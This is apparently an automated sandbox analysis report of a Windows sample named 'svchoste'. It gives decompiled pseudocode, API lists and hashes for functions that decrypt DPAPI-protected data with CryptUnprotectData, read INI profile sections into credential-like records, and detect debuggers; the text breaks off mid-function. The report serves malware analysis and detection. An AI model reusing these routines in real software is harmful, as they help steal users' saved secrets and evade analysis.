0x00b7435c
0x00b7435c
0x00b771dc
0x00b771e1
0x00b771e7
0x00b771ed
0x00b771f3
0x00b771f9
0x00b771ff
0x00b77206
0x00b7720d
0x00b77214
0x00b7721b
0x00b77222
0x00b77229
0x00b7722a
0x00b77233
0x00b7723b
0x00b77243
0x00b7724e
0x00b77258
0x00b7725d
0x00b77262
0x00b7726c
0x00b77276
0x00b7727b
0x00b77281
0x00b77286
0x00b77292
0x00b77297
0x00b77299
0x00b772a1
0x00b772ac
0x00b772b9
0x00b772bb
0x00b772bd
0x00b772c2
0x00b772d6

APIs

IsDebuggerPresent.KERNEL32 ref: 00B7728C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B772A1
UnhandledExceptionFilter.KERNEL32(00B97278), ref: 00B772AC
GetCurrentProcess.KERNEL32(C0000409), ref: 00B772C8
TerminateProcess.KERNEL32(00000000), ref: 00B772CF

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 376e04742324f5947b4c4c4fee432acb3e3c07ad08e3dcf68879eece4f1927c1
Instruction ID: a5098d21e963a3e69732dc6d8786646e0d76024e9201c9faaeb3ff22020215cd
Opcode Fuzzy Hash: 376e04742324f5947b4c4c4fee432acb3e3c07ad08e3dcf68879eece4f1927c1
Instruction Fuzzy Hash: B321D4B89543049FC780DF6CED4AA843BE4FB1A355F00895AE628A32B0DF709A858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00B8EED0, Relevance: 7.5, APIs: 5, Instructions: 49
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00B8EED0(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;

				_v8 = HeapAlloc(GetProcessHeap(), 8, 0x400);
				_v20 = _a4 + 1;
				_v24 = _a8 - 1;
				_push( &_v16);
				_push(1);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v24);
				if( *0xba27e0() == 0) {
					return 0xb9945e;
				}
				WideCharToMultiByte(0, 0, _v12, _v16, _v8, 0x400, 0, 0);
				LocalFree(_v12);
				return _v8;
			}

0x00b8eeea
0x00b8eef3
0x00b8eefc
0x00b8ef02
0x00b8ef03
0x00b8ef05
0x00b8ef07
0x00b8ef09
0x00b8ef0b
0x00b8ef10
0x00b8ef19
0x00000000
0x00b8ef4b
0x00b8ef34
0x00b8ef3e
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B8EEDD
HeapAlloc.KERNEL32(00000000), ref: 00B8EEE4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B8EF11
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B8EF34
LocalFree.KERNEL32(?), ref: 00B8EF3E

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 343794985ccafddb5ce5e33b865184f4396b4f58b1d3e02769f8dad79aad8598
Instruction ID: 0097b259cb4f74373478f7c6c1dc6e94a80237cdaf8d1d9eb267f6767f0b0764
Opcode Fuzzy Hash: 343794985ccafddb5ce5e33b865184f4396b4f58b1d3e02769f8dad79aad8598
Instruction Fuzzy Hash: FF010075A44208BBEB14DB98CC46FAE77B8EB44B04F108154FB15EB2D0DA70AA00CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00B8CBA0, Relevance: 6.1, APIs: 4, Instructions: 55
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8CBA0(void* __ecx, char* _a4, void** _a8, long* _a12) {
				int _v8;

				_v8 = 0;
				 *_a8 = 0;
				 *_a12 = 0;
				if(CryptStringToBinaryA(_a4, 0, 1, 0, _a12, 0, 0) != 0) {
					 *_a8 = LocalAlloc(0x40,  *_a12);
					if( *_a8 != 0) {
						_v8 = CryptStringToBinaryA(_a4, 0, 1,  *_a8, _a12, 0, 0);
						if(_v8 == 0) {
							 *_a8 = LocalFree( *_a8);
						}
					}
				}
				return _v8;
			}

0x00b8cba4
0x00b8cbae
0x00b8cbb7
0x00b8cbd7
0x00b8cbea
0x00b8cbf2
0x00b8cc10
0x00b8cc17
0x00b8cc28
0x00b8cc28
0x00b8cc17
0x00b8cbf2
0x00b8cc30

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00B8CBCF
LocalAlloc.KERNEL32(00000040), ref: 00B8CBE1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00B8CC0A
LocalFree.KERNEL32 ref: 00B8CC1F

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 91ff60039628954d439200c336611a24c99e930d73f837ab13a786721c4e13b2
Instruction ID: ce165057bd34d31521a5c23ebcf30c7234760d1b8b5a8d6e6a6151e12db19cb0
Opcode Fuzzy Hash: 91ff60039628954d439200c336611a24c99e930d73f837ab13a786721c4e13b2
Instruction Fuzzy Hash: 2911C6B4240309AFDB00DF64CC55FAA77B5EB49700F208448F9199B390C771A900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B8CD30, Relevance: 4.6, APIs: 3, Instructions: 61
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00B8CD30(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;

				_v8 = E00B7537B(__edx, __edi, __esi, _a8);
				E00B79240(_v8, _a4, _a8);
				_v12 = _a4;
				_v16 = _a8;
				_v28 = E00B7537B(_a8, __edi, __esi, _a8);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v16);
				if( *0xba27e0() == 0) {
					return 0;
				}
				_v32 = 0;
				while(_v32 < _v24) {
					 *((char*)(_v28 + _v32)) =  *((intOrPtr*)(_v20 + _v32));
					_v32 = _v32 + 1;
				}
				 *((char*)(_v28 + _v24)) = 0;
				return _v28;
			}

0x00b8cd42
0x00b8cd51
0x00b8cd5c
0x00b8cd62
0x00b8cd71
0x00b8cd77
0x00b8cd78
0x00b8cd7a
0x00b8cd7c
0x00b8cd7e
0x00b8cd80
0x00b8cd85
0x00b8cd8e
0x00000000
0x00b8cdcc
0x00b8cd90
0x00b8cda2
0x00b8cdb8
0x00b8cd9f
0x00b8cd9f
0x00b8cdc2
0x00000000

APIs

_malloc.LIBCMT ref: 00B8CD3A

Part of subcall function 00B7537B: __FF_MSGBANNER.LIBCMT ref: 00B75394
Part of subcall function 00B7537B: __NMSG_WRITE.LIBCMT ref: 00B7539B
Part of subcall function 00B7537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00B746A4,00000001,00000000,?,?,?,00B74702,?), ref: 00B753C0

_malloc.LIBCMT ref: 00B8CD69
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B8CD86

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _malloc$AllocateCryptDataHeapUnprotect
String ID:
API String ID: 1951378374-0
Opcode ID: e562d14d8f71ab7b95fdd93bb2b0f424c9a4c474e2b7ef46507ad22e50d20838
Instruction ID: 07c24acfe96b4533cea99606df726482812c5c9d4dab678fe0e79b812f59242f
Opcode Fuzzy Hash: e562d14d8f71ab7b95fdd93bb2b0f424c9a4c474e2b7ef46507ad22e50d20838
Instruction Fuzzy Hash: C0111FB5D04109EFCF00EF98C881AEEBBF4EF48300F14C5A5E919A7311D634AA41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B8F6B0, Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8F6B0(void* __ecx, intOrPtr _a4) {
				union _FINDEX_INFO_LEVELS _v8;

				 *((intOrPtr*)(_a4 + 0x474)) = FindFirstFileExW( *(_a4 + 0x478), 0, _a4 + 0x220, 0, 0, 0);
				if( *((intOrPtr*)(_a4 + 0x474)) == 0xffffffff) {
					 *(_a4 + 0x470) = 0;
					_v8 = 0;
				} else {
					_v8 = _a4 + 0x220;
					 *(_a4 + 0x470) = 1;
				}
				return _v8;
			}

0x00b8f6d8
0x00b8f6e8
0x00b8f707
0x00b8f711
0x00b8f6ea
0x00b8f6f2
0x00b8f6f8
0x00b8f6f8
0x00b8f71e

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00B8F6CF

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 7bd237ff38d3822dd66a7156afba0d996fea8acd18a61424b2dda2896185afe7
Instruction ID: 8f31e507fee02585a7e26c4c848ca87e0eaa742b8cec2af8ec848d4c8e57ee40
Opcode Fuzzy Hash: 7bd237ff38d3822dd66a7156afba0d996fea8acd18a61424b2dda2896185afe7
Instruction Fuzzy Hash: 620131B4204208EBE700CF54C849BA97BA4EB44758F2442A8EA4C4F3C1C772AD82CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E5C7, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E5C7() {

				SetUnhandledExceptionFilter(E00B7E585);
				return 0;
			}

0x00b7e5cc
0x00b7e5d4

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000E585), ref: 00B7E5CC

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2909dc32957f5056024d1cb8667a45109ba6d603c5a2868cee679db3d75b9e07
Instruction ID: f27e36a6d40b24257bf1ac61ec9b8551f1a70ac40247b718cfb5c0aa87f68f72
Opcode Fuzzy Hash: 2909dc32957f5056024d1cb8667a45109ba6d603c5a2868cee679db3d75b9e07
Instruction Fuzzy Hash: 059002A02A514446470017B05E1D50529D46E6C70674544D67235D60A4EE5080049511

Uniqueness

Uniqueness Score: -1.00%

Function 00B896D0, Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B896D0(void* __ecx) {
				intOrPtr _v8;

				_v8 = 0;
				_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				return _v8;
			}

0x00b896d4
0x00b896ee
0x00b896f7

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B750, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8B750() {

				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					return 1;
				} else {
					return 0;
				}
			}

0x00b8b75a
0x00b8b764
0x00b8b75c
0x00b8b75e
0x00b8b75e

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: c224deec28dc60071fc51c7d443b03056c9c0d3b79c26ea4528121671b1eeec6
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: A5B092646125804AEB1287348415F0176E0A780B01F8984E0A00986892C39CDE84D200

Uniqueness

Uniqueness Score: -1.00%

Function 00B78594, Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B78594(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t9;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0xba1444 = GetProcAddress(_t35, "FlsAlloc");
					 *0xba1448 = GetProcAddress(_t35, "FlsGetValue");
					 *0xba144c = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0xba1444;
					_t39 = TlsSetValue;
					 *0xba1450 = _t7;
					if( *0xba1444 == 0) {
						L6:
						 *0xba1448 = TlsGetValue;
						_t9 = __imp__TlsFree; // 0x74e06560
						 *0xba1444 = E00B782A4;
						 *0xba144c = _t39;
						 *0xba1450 = _t9;
					} else {
						__eflags =  *0xba1448;
						if( *0xba1448 == 0) {
							goto L6;
						} else {
							__eflags =  *0xba144c;
							if( *0xba144c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0xba0978 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0xba1448);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00B78980();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0xba1444);
							 *0xba1444 = _t14;
							_t15 =  *_t41( *0xba1448);
							 *0xba1448 = _t15;
							_t16 =  *_t41( *0xba144c);
							 *0xba144c = _t16;
							 *0xba1450 =  *_t41( *0xba1450);
							_t18 = E00B7B0C5();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00B782E1();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0xba1444, E00B78465);
								 *0xba0974 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00B7880C(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0xba144c,  *0xba0974, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00B7831E(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00B782E1();
					return 0;
				}
			}

0x00b78594
0x00b785a2
0x00b785a6
0x00b785c6
0x00b785d3
0x00b785e0
0x00b785e5
0x00b785e7
0x00b785ee
0x00b785f4
0x00b785f9
0x00b78611
0x00b78616
0x00b7861b
0x00b78620
0x00b7862a
0x00b78630
0x00b785fb
0x00b785fb
0x00b78602
0x00000000
0x00b78604
0x00b78604
0x00b7860b
0x00000000
0x00b7860d
0x00b7860d
0x00b7860f
0x00000000
0x00000000
0x00b7860f
0x00b7860b
0x00b78602
0x00b78635
0x00b7863b
0x00b78640
0x00b78643
0x00b7870a
0x00b7870a
0x00b7870a
0x00b78649
0x00b78650
0x00b78652
0x00b78654
0x00000000
0x00b7865a
0x00b7865a
0x00b78665
0x00b7866b
0x00b78673
0x00b78678
0x00b78680
0x00b78685
0x00b7868d
0x00b78694
0x00b78699
0x00b7869e
0x00b786a0
0x00b78705
0x00b78705
0x00000000
0x00b786a2
0x00b786a2
0x00b786b5
0x00b786b7
0x00b786bc
0x00b786bf
0x00000000
0x00b786c1
0x00b786cd
0x00b786d1
0x00b786d3
0x00000000
0x00b786d5
0x00b786e6
0x00b786e8
0x00000000
0x00b786ea
0x00b786ea
0x00b786ec
0x00b786ed
0x00b786f4
0x00b786fa
0x00b786fe
0x00b78702
0x00b78702
0x00b786e8
0x00b786d3
0x00b786bf
0x00b786a0
0x00b78654
0x00b7870e
0x00b785a8
0x00b785a8
0x00b785b0
0x00b785b0

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00B77098), ref: 00B7859C
__mtterm.LIBCMT ref: 00B785A8

Part of subcall function 00B782E1: DecodePointer.KERNEL32(00000005,00B7870A,?,00B77098), ref: 00B782F2
Part of subcall function 00B782E1: TlsFree.KERNEL32(00000004,00B7870A,?,00B77098), ref: 00B7830C
Part of subcall function 00B782E1: DeleteCriticalSection.KERNEL32(00000000,00000000,7763F3A0,?,00B7870A,?,00B77098), ref: 00B7B12C
Part of subcall function 00B782E1: _free.LIBCMT ref: 00B7B12F
Part of subcall function 00B782E1: DeleteCriticalSection.KERNEL32(00000004,7763F3A0,?,00B7870A,?,00B77098), ref: 00B7B156

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B785BE
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B785CB
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B785D8
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B785E5
TlsAlloc.KERNEL32(?,00B77098), ref: 00B78635
TlsSetValue.KERNEL32(00000000,?,00B77098), ref: 00B78650
__init_pointers.LIBCMT ref: 00B7865A
EncodePointer.KERNEL32(?,00B77098), ref: 00B7866B
EncodePointer.KERNEL32(?,00B77098), ref: 00B78678
EncodePointer.KERNEL32(?,00B77098), ref: 00B78685
EncodePointer.KERNEL32(?,00B77098), ref: 00B78692
DecodePointer.KERNEL32(00B78465,?,00B77098), ref: 00B786B3
__calloc_crt.LIBCMT ref: 00B786C8
DecodePointer.KERNEL32(00000000,?,00B77098), ref: 00B786E2
GetCurrentThreadId.KERNEL32 ref: 00B786F4

Strings

`et, xrefs: 00B7861B
FlsAlloc, xrefs: 00B785B8
KERNEL32.DLL, xrefs: 00B78597
FlsGetValue, xrefs: 00B785C0
FlsFree, xrefs: 00B785DA
FlsSetValue, xrefs: 00B785CD

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$`et
API String ID: 3698121176-3670170502
Opcode ID: b58835dbdea0de684952fb9a4e9c50985a7cc398f6937ac2bdcfcd32ca7eb079
Instruction ID: f5f900ace7726ad7f142319b133507a3a6c9a12d8739503657d282f3c9420dba
Opcode Fuzzy Hash: b58835dbdea0de684952fb9a4e9c50985a7cc398f6937ac2bdcfcd32ca7eb079
Instruction Fuzzy Hash: 8D3195359942119BC7616F7DAD1EA163FE4EB4A360F144966E429E33B1EF308800CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B8CDE0, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00B8CDE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				CHAR* _v8;
				signed int _v12;
				char _v4372;
				char _v4636;
				intOrPtr _v4640;
				intOrPtr _v4644;
				intOrPtr _v4648;
				char* _v4652;
				intOrPtr _v4656;
				intOrPtr _v4660;
				char _v4664;
				char _v4668;
				intOrPtr _v4672;
				intOrPtr _v4676;
				intOrPtr* _v4680;
				intOrPtr _v4684;
				char _v4685;
				intOrPtr _v4692;
				intOrPtr* _v4696;
				intOrPtr _v4700;
				char _v4701;
				intOrPtr _v4708;
				intOrPtr* _v4712;
				intOrPtr _v4716;
				char _v4717;
				intOrPtr _v4724;
				void* __ebp;
				signed int _t114;
				intOrPtr _t122;
				intOrPtr _t126;
				intOrPtr _t136;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr* _t142;
				intOrPtr _t148;
				void* _t162;
				intOrPtr _t163;
				intOrPtr _t172;
				intOrPtr _t188;
				intOrPtr _t193;
				intOrPtr _t201;
				intOrPtr _t205;
				intOrPtr _t208;
				intOrPtr* _t209;
				intOrPtr _t213;
				intOrPtr _t216;
				intOrPtr _t218;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t228;
				intOrPtr _t241;
				signed int _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t252;
				void* _t258;
				void* _t260;
				void* _t267;
				void* _t272;

				_t245 = __esi;
				_t244 = __edi;
				_t182 = __ebx;
				E00B82A40(0x1270);
				_t114 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t114 ^ _t246;
				 *0xba2868(0, 0x1a, 0, 0,  &_v4636);
				_t216 =  *0xba24c4; // 0x2d06c88
				E00B76125(_t216, _a12, 4, _t216,  &_v4636);
				_t217 =  &_v4372;
				GetPrivateProfileSectionNamesA( &_v4372, 0x1000, _a12);
				_v8 =  &_v4372;
				_t122 =  *0xba2738(_a12);
				_t249 = _t247 + 0x14;
				if(_t122 == 0) {
					_push(0xba270c);
					_t122 = E00B7611A();
					_t250 = _t249 + 4;
					_v4640 = _t122;
					if(_v4640 < 0x20) {
						_push(0);
						_t218 =  *0xba26f0; // 0x2d068c8
						_v4648 = E00B8A3B0(_a12, _t218);
						_v4668 = 0;
						_v4664 = 0;
						_t188 =  *0xba264c; // 0x2d06730
						_t217 = _v4648;
						_t126 = E00B755AB(_v4648, _t188);
						_t252 = _t250 + 0x14;
						_v4660 = _t126;
						_t279 = _v4660;
						if(_v4660 != 0) {
							_push(2);
							_push(0);
							_push(_v4660);
							E00B766BB(__ebx, _t217, __edi, __esi, _t279);
							_push(_v4660);
							_v4668 = E00B765CC(__ebx, __edi, __esi, _t279);
							_push(0);
							E00B766BB(__ebx, _v4660, __edi, __esi, _t279);
							_v4676 = E00B74349(_t244, _t245, _t279, _v4668 + 1, _v4660, 0);
							_v4644 = _v4676;
							E00B7641B(_v4644, 1, _v4668, _v4660);
							_t217 =  *0xba2188; // 0x2d06700
							_t136 =  *0xba25d0; // 0x2d06af0
							_t137 = E00B755AB(_t136, _t217);
							_t258 = _t252 + 0x38;
							_v4672 = _t137;
							if(_v4672 != 0) {
								while(1) {
									_t193 =  *0xba21b0; // 0x2d06a48
									_t217 = _v4644;
									_t139 = E00B72D10(_v4644, _t193);
									_t260 = _t258 + 8;
									_v4656 = _t139;
									if(_v4656 == 0) {
										break;
									}
									_t142 =  *0xba21b0; // 0x2d06a48
									_v4680 = _t142;
									_v4684 = _v4680 + 1;
									do {
										_v4685 =  *_v4680;
										_v4680 = _v4680 + 1;
										_t283 = _v4685;
									} while (_v4685 != 0);
									_v4692 = _v4680 - _v4684;
									_t49 = _v4692 + 3; // 0x3
									_v4656 = _v4656 + _t49;
									_t223 =  *0xba2394; // 0x2d06a90
									_v4652 = E00B72D10(_v4656, _t223) - 3;
									 *_v4652 = 0;
									_push(_a4);
									_t148 =  *0xba239c; // 0x2d06a60
									_push(_t148);
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t283);
									_push(_a8);
									_t201 =  *0xba23b8; // 0x2d06a30
									_push(_t201);
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t283);
									_push(_v4656);
									_t227 =  *0xba2258; // 0x2d068b0
									_push(_t227);
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t283);
									_t267 = _t260 + 0x44;
									_t228 =  *0xba2548; // 0x2d061c0
									_v4696 = _t228;
									_v4700 = _v4696 + 1;
									do {
										_v4701 =  *_v4696;
										_v4696 = _v4696 + 1;
										_t285 = _v4701;
									} while (_v4701 != 0);
									_v4708 = _v4696 - _v4700;
									_t205 =  *0xba2548; // 0x2d061c0
									_t162 = E00B72D10(_v4652 + 1, _t205);
									_t77 = _v4708 + 3; // 0x3
									_v4656 = _t162 + _t77;
									_t163 =  *0xba2544; // 0x2d05f80
									_v4652 = E00B72D10(_v4656, _t163) - 3;
									 *_v4652 = 0;
									_push(E00B8C900(_t182, _t244, _t245, _v4656));
									_t208 =  *0xba22b4; // 0x2d06b80
									_push(_t208);
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t285);
									_push("\n");
									_push(_v4672);
									E00B755C2(_t182, _t244, _t245, _t285);
									_t272 = _t267 + 0x28;
									_t209 =  *0xba2544; // 0x2d05f80
									_v4712 = _t209;
